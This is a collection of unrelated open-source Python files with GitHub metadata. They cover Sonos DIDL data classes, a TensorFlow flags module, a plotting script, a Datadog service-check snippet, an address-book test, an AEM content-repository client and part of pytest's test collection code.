_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'region': ('upnp', 'region'),
'radio_call_sign': ('upnp', 'radioCallSign'),
'radio_station_id': ('upnp', 'radioStationID'),
'channel_nr': ('upnp', 'channelNr'),
}
)
class DidlAudioBroadcastFavorite(DidlAudioBroadcast):
"""Class that represents an audio broadcast sonos favorite."""
# Note: The sonos-favorite part of the class spec obviously isn't part of
# the DIDL spec, so just assume that it has the same definition as the
# regular object.item.audioItem.audioBroadcast
item_class = 'object.item.audioItem.audioBroadcast.sonos-favorite'
###############################################################################
# OBJECT.CONTAINER HIERARCHY #
###############################################################################
class DidlContainer(DidlObject):
"""Class that represents a music library container. """
item_class = 'object.container'
tag = 'container'
# We do not implement createClass or searchClass. Not used by Sonos??
# TODO: handle the 'childCount' element.
class DidlAlbum(DidlContainer):
"""A content directory album."""
item_class = 'object.container.album'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'description': ('dc', 'description'),
'long_description': ('upnp', 'longDescription'),
'publisher': ('dc', 'publisher'),
'contributor': ('dc', 'contributor'),
'date': ('dc', 'date'),
'relation': ('dc', 'relation'),
'rights': ('dc', 'rights'),
}
)
class DidlMusicAlbum(DidlAlbum):
"""Class that represents a music library album. """
item_class = 'object.container.album.musicAlbum'
# According to the spec, all musicAlbums should be represented in
# XML by a <container> tag. Sonos sometimes uses <container> and
# sometimes uses <item>. Set the tag type to '' to indicate that
# either is allowed.
tag = ''
# name: (ns, tag)
# pylint: disable=protected-access
_translation = DidlAudioItem._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'genre': ('upnp', 'genre'),
'producer': ('upnp', 'producer'),
'toc': ('upnp', 'toc'),
'album_art_uri': ('upnp', 'albumArtURI'),
}
)
class DidlMusicAlbumFavorite(DidlAlbum):
"""Class that represents a Sonos favorite music library album.
This class is not part of the DIDL spec and is Sonos specific.
"""
item_class = 'object.container.album.musicAlbum.sonos-favorite'
    # Despite the fact that the item derives from object.container, its
# XML does not include a <container> tag, but an <item> tag. This seems
# to be an error by Sonos.
tag = 'item'
class DidlMusicAlbumCompilation(DidlAlbum):
"""Class that represents a Sonos favorite music library compilation.
This class is not part of the DIDL spec and is Sonos specific.
"""
# These classes appear when browsing the library and Sonos has been set
# to group albums using compilations.
# See https://github.com/SoCo/SoCo/issues/280
item_class = 'object.container.album.musicAlbum.compilation'
tag = 'container'
class DidlPerson(DidlContainer):
"""A content directory class representing a person."""
item_class = 'object.container.person'
_translation = DidlContainer._translation.copy()
_translation.update(
{
'language': ('dc', 'language'),
}
)
class DidlComposer(DidlPerson):
"""Class that represents a music library composer."""
# Not in the DIDL-Lite spec. Sonos specific??
item_class = 'object.container.person.composer'
class DidlMusicArtist(DidlPerson):
"""Class that represents a music library artist."""
item_class = 'object.container.person.musicArtist'
# name: (ns, tag)
_translation = DidlPerson._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'artist_discography_uri': ('upnp', 'artistDiscographyURI'),
}
)
class DidlAlbumList(DidlContainer):
"""Class that represents a music library album list."""
# This does not appear (that I can find) in the DIDL-Lite specs.
# Presumably Sonos specific
item_class = 'object.container.albumlist'
class DidlPlaylistContainer(DidlContainer):
"""Class that represents a music library play list."""
item_class = 'object.container.playlistContainer'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'artist': ('upnp', 'artist'),
'genre': ('upnp', 'genre'),
'long_description': ('upnp', 'longDescription'),
'producer': ('dc', 'producer'),
'contributor': ('dc', 'contributor'),
'description': ('dc', 'description'),
'date': ('dc', 'date'),
'language': ('dc', 'language'),
'rights': ('dc', 'rights'),
}
)
class DidlSameArtist(DidlPlaylistContainer):
"""Class that represents all tracks by a single artist.
This type is returned by browsing an artist or a composer
"""
# Not in the DIDL-Lite spec. Sonos specific?
item_class = 'object.container.playlistContainer.sameArtist'
class DidlGenre(DidlContainer):
"""A content directory class representing a general genre."""
item_class = 'object.container.genre'
# name: (ns, tag)
_translation = DidlContainer._translation.copy()
_translation.update(
{
'genre': ('upnp', 'genre'),
'long_description': ('upnp', 'longDescription'),
'description': ('dc', 'description'),
}
)
class DidlMusicGenre(DidlGenre):
"""Class that represents a music genre."""
item_class = 'object.container.genre.musicGenre'
###############################################################################
# SPECIAL LISTS #
###############################################################################
class ListOfMusicInfoItems(list):
"""Abstract container class for a list of music information items."""
def __init__(self, items, number_returned, total_matches, update_id):
super(ListOfMusicInfoItems, self).__init__(items)
self._metadata = {
'item_list': list(items),
'number_returned': number_returned,
'total_matches': total_matches,
'update_id': update_id,
}
def __getitem__(self, key):
"""Legacy get metadata by string key or list item(s) by index.
DEPRECATION: This overriding form of __getitem__ will be removed in
the 3rd release after 0.8. The metadata can be fetched via the named
attributes
"""
if key in self._metadata:
if key == 'item_list':
message = """
Calling [\'item_list\'] on search results to obtain the objects
is no longer necessary, since the object returned from searches
now is a list. This deprecated way of getting the items will
be removed from the third release after 0.8."""
else:
message = """
Getting metadata items by indexing the search result like a
dictionary [\'{0}\'] is deprecated. Please use the named
attribute {1}.{0} instead. The deprecated way of retrieving the
metadata will be removed from the third release after
0.8""".format(key, self.__class__.__name__)
message = textwrap.dedent(message).replace('\n', ' ').lstrip()
warnings.warn(message, DeprecationWarning, stacklevel=2)
return self._metadata[key]
else:
return super(ListOfMusicInfoItems, self).__getitem__(key)
@property
def number_returned(self):
"""The number of returned matches."""
return self._metadata['number_returned']
@property
def total_matches(self):
"""The number of total matches."""
return self._metadata['total_matches']
@property
def update_id(self):
"""The update ID."""
return self._metadata['update_id']
class SearchResult(ListOfMusicInfoItems):
"""Container class that represents a search or browse result.
(browse is just a special case of search)
"""
def __init__(self, items, search_type, number_returned,
total_matches, update_id):
super(SearchResult, self).__init__(
items, number_returned, total_matches, update_id
)
self._metadata['search_type'] = search_type
def __repr__(self):
return '{0}(items={1}, search_type=\'{2}\')'.format(
self.__class__.__name__,
super(SearchResult, self).__repr__(),
self.search_type)
@property
def search_type(self):
"""The search type."""
return self._metadata['search_type']
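# Access sketch (illustrative): given a SearchResult instance `result`, read
# the metadata through the named properties rather than the deprecated
# dict-style indexing:
#
#     result.total_matches        # preferred
#     result['total_matches']     # still works, but emits DeprecationWarning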
class Queue(ListOfMusicInfoItems):
"""Container class that represents a queue."""
def __init__(self, items, number_returned, total_matches, update_id):
super(Queue, self).__init__(
items, number_returned, total_matches, update_id
)
def __repr__(self):
return '{0}(items={1})'.format(
self.__class__.__name__,
super(Queue, self).__repr__(),
)
|
{
"content_hash": "202d24161b6b59a48069eeaee79e4f07",
"timestamp": "",
"source": "github",
"line_count": 989,
"max_line_length": 81,
"avg_line_length": 36.68655207280081,
"alnum_prop": 0.5726648843811151,
"repo_name": "bwhaley/SoCo",
"id": "2d5b7b7e0320d4a82368071b60b4488b8990a38b",
"size": "36364",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "soco/data_structures.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "168"
},
{
"name": "CSS",
"bytes": "571"
},
{
"name": "HTML",
"bytes": "4055"
},
{
"name": "Makefile",
"bytes": "66"
},
{
"name": "Python",
"bytes": "398195"
},
{
"name": "Shell",
"bytes": "342"
}
],
"symlink_target": ""
}
|
"""Implementation of the flags interface."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
_global_parser = argparse.ArgumentParser()
class _FlagValues(object):
def __init__(self):
"""Global container and accessor for flags and their values."""
self.__dict__['__flags'] = {}
self.__dict__['__parsed'] = False
def _parse_flags(self):
result, _ = _global_parser.parse_known_args()
for flag_name, val in vars(result).items():
self.__dict__['__flags'][flag_name] = val
self.__dict__['__parsed'] = True
def __getattr__(self, name):
"""Retrieves the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self._parse_flags()
if name not in self.__dict__['__flags']:
raise AttributeError(name)
return self.__dict__['__flags'][name]
def __setattr__(self, name, value):
"""Sets the 'value' attribute of the flag --name."""
if not self.__dict__['__parsed']:
self._parse_flags()
self.__dict__['__flags'][name] = value
def _define_helper(flag_name, default_value, docstring, flagtype):
"""Registers 'flag_name' with 'default_value' and 'docstring'."""
_global_parser.add_argument("--" + flag_name,
default=default_value,
help=docstring,
type=flagtype)
# Provides the global object that can be used to access flags.
FLAGS = _FlagValues()
def DEFINE_string(flag_name, default_value, docstring):
"""Defines a flag of type 'string'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a string.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, str)
def DEFINE_integer(flag_name, default_value, docstring):
"""Defines a flag of type 'int'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as an int.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, int)
def DEFINE_boolean(flag_name, default_value, docstring):
"""Defines a flag of type 'boolean'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a boolean.
docstring: A helpful message explaining the use of the flag.
"""
# Register a custom function for 'bool' so --flag=True works.
def str2bool(v):
return v.lower() in ('true', 't', '1')
_global_parser.add_argument('--' + flag_name,
nargs='?',
const=True,
help=docstring,
default=default_value,
type=str2bool)
# Add negated version, stay consistent with argparse with regard to
# dashes in flag names.
_global_parser.add_argument('--no' + flag_name,
action='store_false',
dest=flag_name.replace('-', '_'))
# The internal google library defines the following alias, so we match
# the API for consistency.
DEFINE_bool = DEFINE_boolean # pylint: disable=invalid-name
def DEFINE_float(flag_name, default_value, docstring):
"""Defines a flag of type 'float'.
Args:
flag_name: The name of the flag as a string.
default_value: The default value the flag should take as a float.
docstring: A helpful message explaining the use of the flag.
"""
_define_helper(flag_name, default_value, docstring, float)
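# Usage sketch (illustrative; the flag names below are made up):
#
#     DEFINE_string('data_dir', '/tmp/data', 'Directory holding input data.')
#     DEFINE_boolean('verbose', False, 'Enable verbose logging.')
#
#     # FLAGS parses sys.argv lazily on first attribute access:
#     print(FLAGS.data_dir, FLAGS.verbose)
#
# Because DEFINE_boolean also registers a negated flag, passing --noverbose on
# the command line sets FLAGS.verbose to False.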
|
{
"content_hash": "f7319323c74c85bd205ed26024bef810",
"timestamp": "",
"source": "github",
"line_count": 110,
"max_line_length": 71,
"avg_line_length": 33.60909090909091,
"alnum_prop": 0.6205031106302408,
"repo_name": "Lab603/PicEncyclopedias",
"id": "85f9e2cb860d02166e2171e1cebd9e5ebccfc25b",
"size": "4387",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "jni-build/jni-build/jni/include/tensorflow/python/platform/flags.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C",
"bytes": "361482"
},
{
"name": "C++",
"bytes": "22994090"
},
{
"name": "CMake",
"bytes": "72924"
},
{
"name": "CSS",
"bytes": "1548"
},
{
"name": "HTML",
"bytes": "1040352"
},
{
"name": "Java",
"bytes": "252082"
},
{
"name": "JavaScript",
"bytes": "25902"
},
{
"name": "Jupyter Notebook",
"bytes": "3547008"
},
{
"name": "Makefile",
"bytes": "47206"
},
{
"name": "Objective-C",
"bytes": "10664"
},
{
"name": "Objective-C++",
"bytes": "91354"
},
{
"name": "Python",
"bytes": "19063444"
},
{
"name": "Shell",
"bytes": "476334"
},
{
"name": "TypeScript",
"bytes": "1264488"
}
],
"symlink_target": ""
}
|
import matplotlib.pyplot as plt
import seaborn as sb
import numpy as np
import pandas as pd
P_letter_lang = pd.read_csv('table_langs.dat', sep=' ', header=0, index_col=0)
plt.plot(range(26), np.array(P_letter_lang["eng"]), '-')
plt.plot(range(26), np.array(P_letter_lang["fre"]), '-')
plt.plot(range(26), np.array(P_letter_lang["ger"]), '-')
plt.plot(range(26), np.array(P_letter_lang["ita"]), '-')
plt.plot(range(26), np.array(P_letter_lang["spa"]), '-')
plt.xticks(list(range(26)), P_letter_lang.index)
plt.legend(["English", "French", "German", "Italian", "Spanish"])
plt.xlabel("letter")
plt.ylabel("P(letter)")
plt.savefig("letter_lang.png")
|
{
"content_hash": "2d9a224769c11b1e98ba0b83e77302b7",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 80,
"avg_line_length": 40.375,
"alnum_prop": 0.6640866873065016,
"repo_name": "bmtgoncalves/IFISC2017",
"id": "aa605ca741b88d9abda74286d6dc647bc10495a0",
"size": "670",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "plot_langs.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "18895"
}
],
"symlink_target": ""
}
|
from datadog import initialize, api
from datadog.api.constants import CheckStatus
options = {
'api_key': '9775a026f1ca7d1c6c5af9d94d9595a4',
'app_key': '87ce4a24b5553d2e482ea8a8500e71b8ad4554ff'
}
initialize(**options)
check = 'app.ok'
host = 'app1'
status = CheckStatus.OK
api.ServiceCheck.check(check=check, host_name=host, status=status, message='Response: 200 OK')
|
{
"content_hash": "e31349d6af45d3bcb82891fe4244e6c3",
"timestamp": "",
"source": "github",
"line_count": 15,
"max_line_length": 94,
"avg_line_length": 25.4,
"alnum_prop": 0.7585301837270341,
"repo_name": "inokappa/documentation",
"id": "cac35d7a6fbef3251cf32ade791029b097854cb4",
"size": "381",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "code_snippets/api-checks-post.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "13150"
},
{
"name": "HTML",
"bytes": "301722"
},
{
"name": "JavaScript",
"bytes": "26084"
},
{
"name": "Python",
"bytes": "33938"
},
{
"name": "Ruby",
"bytes": "46212"
},
{
"name": "Shell",
"bytes": "41155"
}
],
"symlink_target": ""
}
|
from model.contact import Contact
import random
def test_delete_first_contact(app, db, check_ui): # add a fixture app as a parameter
if len(db.get_contact_list()) == 0:
app.contact.create(Contact(firstname="Ivan"))
old_contacts = db.get_contact_list()
contact = random.choice(old_contacts)
app.contact.delete_contact_by_id(contact.id)
assert len(old_contacts) - 1 == app.contact.count()
new_contacts = db.get_contact_list()
old_contacts.remove(contact)
assert old_contacts == new_contacts
if check_ui: # only do assertion when --check_ui option exists (it was added as a fixture to conftest.py)
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
|
{
"content_hash": "e650c7cdfac327c83a677031c5944f70",
"timestamp": "",
"source": "github",
"line_count": 16,
"max_line_length": 123,
"avg_line_length": 47.9375,
"alnum_prop": 0.6988265971316818,
"repo_name": "Lana-Pa/Python-training",
"id": "25d235938921ef306c760008407fae28eadd4554",
"size": "767",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/test_delete_contact.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "46047"
}
],
"symlink_target": ""
}
|
from . import bagofrequests as bag
from BeautifulSoup import BeautifulSoup
from . import handlers
import re
from . import result as res
HEX_MASSAGE = [(re.compile('&#x([^;]+);'), lambda m: '&#%d;' % int(m.group(1), 16))]
class ContentRepo(object):
def __init__(self, url, **kwargs):
self.url = url
self.kwargs = kwargs
self.handlers = {
401: handlers.auth_fail,
405: handlers.method_not_allowed
}
def create_path(self, path, **kwargs):
def _handler_exist(response, **kwargs):
message = 'Path {0} already exists'.format(path)
result = res.PyAemResult(response)
result.warning(message)
return result
def _handler_ok(response, **kwargs):
message = 'Path {0} created'.format(path)
result = res.PyAemResult(response)
result.success(message)
return result
_handlers = {
200: _handler_exist,
201: _handler_ok
}
method = 'post'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def delete_path(self, path, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Path {0} deleted'.format(path)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = 'Path {0} not found'.format(path)
result = res.PyAemResult(response)
result.warning(message)
return result
_handlers = {
204: _handler_ok,
404: _handler_not_found
}
method = 'delete'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def activate_path(self, path, **kwargs):
def _handler_ok(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
errors = soup.findAll(attrs={'class': 'error'})
result = res.PyAemResult(response)
if len(errors) == 0:
message = 'Path {0} activated'.format(path)
result.success(message)
else:
message = errors[0].string
result.failure(message)
return result
params = {
'cmd': 'activate',
'path': path
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/etc/replication/treeactivation.html'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def does_user_exist(self, user_path, user_name, **kwargs):
node_path = '{0}/{1}'.format(user_path.rstrip('/'), user_name.lstrip('/'))
return self._does_node_exist(node_path, 'User', **kwargs)
def create_user(self, user_path, user_name, password, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0}/{1} created'.format(user_path.rstrip('/'), user_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_exist_or_error(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
            if message_elem is not None:
message = message_elem.contents[0]
exist_message = ('org.apache.jackrabbit.api.security.user.AuthorizableExistsException: ' +
'User or Group for \'{0}\' already exists'.format(user_name))
result = res.PyAemResult(response)
if message == exist_message:
result.warning('User {0}/{1} already exists'.format(user_path.rstrip('/'), user_name))
else:
result.failure(message)
return result
params = {
'createUser': '',
'authorizableId': user_name,
'rep:password': password,
'intermediatePath': user_path
}
_handlers = {
201: _handler_ok,
500: _handler_exist_or_error
}
method = 'post'
url = '{0}/libs/granite/security/post/authorizables'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def add_user_to_group(self, user_name, group_path, group_name, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0} added to group {1}/{2}'.format(user_name, group_path.rstrip('/'), group_name)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
'addMembers': user_name
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/{1}/{2}.rw.html'.format(self.url, group_path.strip('/'), group_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def does_group_exist(self, group_path, group_name, **kwargs):
node_path = '{0}/{1}'.format(group_path.rstrip('/'), group_name.lstrip('/'))
return self._does_node_exist(node_path, 'Group', **kwargs)
def create_group(self, group_path, group_name, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Group {0}/{1} created'.format(group_path.rstrip('/'), group_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_exist_or_error(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
            if message_elem is not None:
message = message_elem.contents[0]
exist_message = ('org.apache.jackrabbit.api.security.user.AuthorizableExistsException: ' +
'User or Group for \'{0}\' already exists'.format(group_name))
result = res.PyAemResult(response)
if message == exist_message:
result.warning('Group {0}/{1} already exists'.format(group_path.rstrip('/'), group_name))
else:
result.failure(message)
return result
params = {
'createGroup': '',
'authorizableId': group_name,
'profile/givenName': group_name,
'intermediatePath': group_path
}
_handlers = {
201: _handler_ok,
500: _handler_exist_or_error
}
method = 'post'
url = '{0}/libs/granite/security/post/authorizables'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def change_password(self, user_path, user_name, old_password, new_password, **kwargs):
def _handler_ok(response, **kwargs):
message = 'User {0}/{1} password changed'.format(user_path.rstrip('/'), user_name)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
':currentPassword': old_password,
'rep:password': new_password
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/{1}/{2}.rw.html'.format(self.url, user_path.strip('/'), user_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def set_permission(self, user_or_group_name, path, permissions, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Permissions {0} set on path {1} for user/group {2}'.format(permissions, path, user_or_group_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
soup = BeautifulSoup(response['body'],
convertEntities=BeautifulSoup.HTML_ENTITIES,
markupMassage=HEX_MASSAGE
)
message_elem = soup.find('div', {'id': 'Message'})
message = message_elem.contents[0]
result = res.PyAemResult(response)
result.failure(message)
return result
params = {
'authorizableId': user_or_group_name,
'changelog': 'path:{0},{1}'.format(path, permissions)
}
_handlers = {
200: _handler_ok,
404: _handler_not_found
}
method = 'post'
url = '{0}/.cqactions.html'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def create_agent(self, agent_name, agent_type, dest_username, dest_password, dest_url, run_mode, **kwargs):
def _handler_ok_created(response, **kwargs):
message = '{0} agent {1} created'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_ok_updated(response, **kwargs):
message = '{0} agent {1} updated'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
if agent_type == 'flush':
params = {
'jcr:content/cq:name': 'flush',
'jcr:content/protocolHTTPHeaders': ['CQ-Action:{action}', 'CQ-Handle:{path}', 'CQ-Path:{path}'],
'jcr:content/protocolHTTPHeaders@TypeHint': 'String[]',
'jcr:content/protocolHTTPMethod': 'GET',
'jcr:content/serializationType': 'flush',
'jcr:content/noVersioning': 'true',
'jcr:content/jcr:mixinTypes': 'cq:ReplicationStatus',
'jcr:content/triggerReceive': 'true',
'jcr:content/triggerSpecific': 'true',
'jcr:content/transportUri': '{0}/dispatcher/invalidate.cache'.format(dest_url.rstrip('/'))
}
else:
params = {
'jcr:content/serializationType': 'durbo',
'jcr:content/transportUri': '{0}/bin/receive?sling:authRequestLogin=1'.format(dest_url.rstrip('/'))
}
params['jcr:primaryType'] = 'cq:Page'
params['jcr:content/sling:resourceType'] = '/libs/cq/replication/components/agent'
params['jcr:content/cq:template'] = '/libs/cq/replication/templates/agent'
params['jcr:content/enabled'] = 'true'
        if dest_username is not None:
            params['jcr:content/transportUser'] = dest_username
        if dest_password is not None:
            params['jcr:content/transportPassword'] = dest_password
_handlers = {
200: _handler_ok_updated,
201: _handler_ok_created
}
method = 'post'
url = '{0}/etc/replication/agents.{1}/{2}'.format(self.url, run_mode, agent_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def delete_agent(self, agent_name, run_mode, **kwargs):
def _handler_ok(response, **kwargs):
message = '{0} agent {1} deleted'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = '{0} agent {1} not found'.format(run_mode, agent_name)
result = res.PyAemResult(response)
result.warning(message)
return result
params = {
}
_handlers = {
204: _handler_ok,
404: _handler_not_found
}
method = 'delete'
url = '{0}/etc/replication/agents.{1}/{2}'.format(self.url, run_mode, agent_name)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def set_property(self, path, property_name, property_value, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Set property {0}={1} on path {2}'.format(property_name, property_value, path)
result = res.PyAemResult(response)
result.success(message)
return result
params = {
property_name: property_value
}
_handlers = {
200: _handler_ok,
201: _handler_ok
}
method = 'post'
url = '{0}/{1}'.format(self.url, path.lstrip('/'))
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def enable_workflow(self, workflow, glob, edit, node_type, run_mode, **kwargs):
return self._set_workflow(workflow, glob, edit, True, node_type, run_mode, **kwargs)
def disable_workflow(self, workflow, glob, edit, node_type, run_mode, **kwargs):
return self._set_workflow(workflow, glob, edit, False, node_type, run_mode, **kwargs)
def _does_node_exist(self, node_path, node_desc, **kwargs):
def _handler_ok(response, **kwargs):
message = '{0} {1} exists'.format(node_desc, node_path)
result = res.PyAemResult(response)
result.success(message)
return result
def _handler_not_found(response, **kwargs):
message = '{0} {1} does not exist'.format(node_desc, node_path)
result = res.PyAemResult(response)
result.failure(message)
return result
_handlers = {
200: _handler_ok,
404: _handler_not_found
}
method = 'get'
url = '{0}/{1}'.format(self.url, node_path.lstrip('/'))
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def _set_workflow(self, workflow, glob, edit, is_enabled, node_type, run_mode, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Workflow {0} {1}'.format(workflow, 'enabled' if is_enabled == True else 'disabled')
result = res.PyAemResult(response)
result.success(message)
return result
params = {
':status': 'browser',
'_charset_': 'utf-8',
'condition': kwargs.get('condition', ''),
'description': kwargs.get('description', ''),
'edit': edit,
'enabled': 'true' if is_enabled == True else 'false',
'eventType': '16',
'excludeList': kwargs.get('excludeList', ''),
'glob': glob,
'nodetype': node_type,
'runModes': run_mode,
'workflow': workflow
}
_handlers = {
200: _handler_ok
}
method = 'post'
url = '{0}/libs/cq/workflow/launcher'.format(self.url)
params = dict(params.items() + kwargs.items())
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
def get_cluster_list(self, **kwargs):
def _handler_ok(response, **kwargs):
message = 'Cluster list retrieved'
result = res.PyAemResult(response)
result.success(message)
return result
_handlers = {
200: _handler_ok
}
method = 'get'
url = '{0}/libs/granite/cluster/content/admin/cluster.list.json'.format(self.url)
params = kwargs
_handlers = dict(self.handlers.items() + _handlers.items())
opts = self.kwargs
return bag.request(method, url, params, _handlers, **opts)
|
{
"content_hash": "4a44e3728f6835db4a038f2062d1cd20",
"timestamp": "",
"source": "github",
"line_count": 540,
"max_line_length": 120,
"avg_line_length": 32.592592592592595,
"alnum_prop": 0.5505681818181818,
"repo_name": "Sensis/pyaem",
"id": "704befe14749e8da46ea9d3b0c9ef0269c6c5b41",
"size": "17600",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "pyaem/contentrepo.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "143605"
}
],
"symlink_target": ""
}
|
""" Python test discovery, setup and run of test functions. """
import re
import fnmatch
import functools
import py
import inspect
import sys
import pytest
from _pytest.mark import MarkDecorator, MarkerError
from py._code.code import TerminalRepr
try:
import enum
except ImportError: # pragma: no cover
# Only available in Python 3.4+ or as a backport
enum = None
import _pytest
import pluggy
cutdir2 = py.path.local(_pytest.__file__).dirpath()
cutdir1 = py.path.local(pluggy.__file__.rstrip("oc"))
NoneType = type(None)
NOTSET = object()
isfunction = inspect.isfunction
isclass = inspect.isclass
callable = py.builtin.callable
# used to work around a python2 exception info leak
exc_clear = getattr(sys, 'exc_clear', lambda: None)
# The type of re.compile objects is not exposed in Python.
REGEX_TYPE = type(re.compile(''))
def filter_traceback(entry):
return entry.path != cutdir1 and not entry.path.relto(cutdir2)
def get_real_func(obj):
""" gets the real function object of the (possibly) wrapped object by
functools.wraps or functools.partial.
"""
while hasattr(obj, "__wrapped__"):
obj = obj.__wrapped__
if isinstance(obj, functools.partial):
obj = obj.func
return obj
def getfslineno(obj):
# xxx let decorators etc specify a sane ordering
obj = get_real_func(obj)
if hasattr(obj, 'place_as'):
obj = obj.place_as
fslineno = py.code.getfslineno(obj)
assert isinstance(fslineno[1], int), obj
return fslineno
def getimfunc(func):
try:
return func.__func__
except AttributeError:
try:
return func.im_func
except AttributeError:
return func
def safe_getattr(object, name, default):
""" Like getattr but return default upon any Exception.
Attribute access can potentially fail for 'evil' Python objects.
See issue214
"""
try:
return getattr(object, name, default)
except Exception:
return default
class FixtureFunctionMarker:
def __init__(self, scope, params,
autouse=False, yieldctx=False, ids=None):
self.scope = scope
self.params = params
self.autouse = autouse
self.yieldctx = yieldctx
self.ids = ids
def __call__(self, function):
if isclass(function):
raise ValueError(
"class fixtures not supported (may be in the future)")
function._pytestfixturefunction = self
return function
def fixture(scope="function", params=None, autouse=False, ids=None):
""" (return a) decorator to mark a fixture factory function.
    This decorator can be used (with or without parameters) to define
a fixture function. The name of the fixture function can later be
referenced to cause its invocation ahead of running tests: test
modules or classes can use the pytest.mark.usefixtures(fixturename)
marker. Test functions can directly use fixture names as input
arguments in which case the fixture instance returned from the fixture
function will be injected.
:arg scope: the scope for which this fixture is shared, one of
"function" (default), "class", "module", "session".
:arg params: an optional list of parameters which will cause multiple
invocations of the fixture function and all of the tests
using it.
:arg autouse: if True, the fixture func is activated for all tests that
can see it. If False (the default) then an explicit
reference is needed to activate the fixture.
:arg ids: list of string ids each corresponding to the params
so that they are part of the test id. If no ids are provided
they will be generated automatically from the params.
"""
if callable(scope) and params is None and autouse == False:
# direct decoration
return FixtureFunctionMarker(
"function", params, autouse)(scope)
if params is not None and not isinstance(params, (list, tuple)):
params = list(params)
return FixtureFunctionMarker(scope, params, autouse, ids=ids)
